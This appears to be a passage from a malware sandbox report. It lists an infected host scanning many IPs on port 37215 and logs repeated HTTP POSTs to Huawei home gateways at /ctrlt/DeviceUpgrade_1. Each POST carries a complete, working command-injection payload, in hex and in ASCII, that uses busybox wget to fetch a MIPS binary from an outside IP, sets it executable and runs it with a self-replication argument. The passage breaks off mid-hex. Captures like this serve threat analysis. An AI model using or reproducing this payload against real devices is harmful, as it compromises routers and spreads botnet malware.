            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.9.240.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 205.74.112.51:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.213.234.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 46.246.65.215:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 169.217.59.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 58.175.224.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.212.69.97:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.192.17.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.145.8.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 110.61.116.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 194.65.90.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.210.134.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 219.232.77.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 150.219.3.247:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 158.79.112.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.139.9.188:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 94.219.112.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.242.122.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.207.95.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.152.191.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.134.249.240:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.211.226.74:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.20.202.42:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.204.117.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.75.110.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.248.142.79:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.129.30.228:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 123.173.69.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.38.65.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.174.104.143:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.168.22.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.76.183.62:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.54.177.184:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.122.118.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.105.243.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.88.137.151:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.33.5.3:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.87.155.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.177.160.209:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.161.172.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.232.82.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.242.176.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 1.186.223.208:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 39.114.162.52:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 115.114.236.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 210.113.66.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.202.95.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.141.183.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.156.176.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.121.182.118:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.37.200.174:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.125.189.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.154.70.87:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 80.22.216.159:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.13.0.150:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.12.195.125:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.123.226.61:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.24.182.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.5.125.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.209.79.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.119.216.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.3.69.197:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 105.120.48.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.213.94.78:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.82.119.39:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.110.39.132:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.77.32.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.77.17.187:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 66.39.101.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.248.182.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 99.60.52.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 132.102.255.165:37215
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 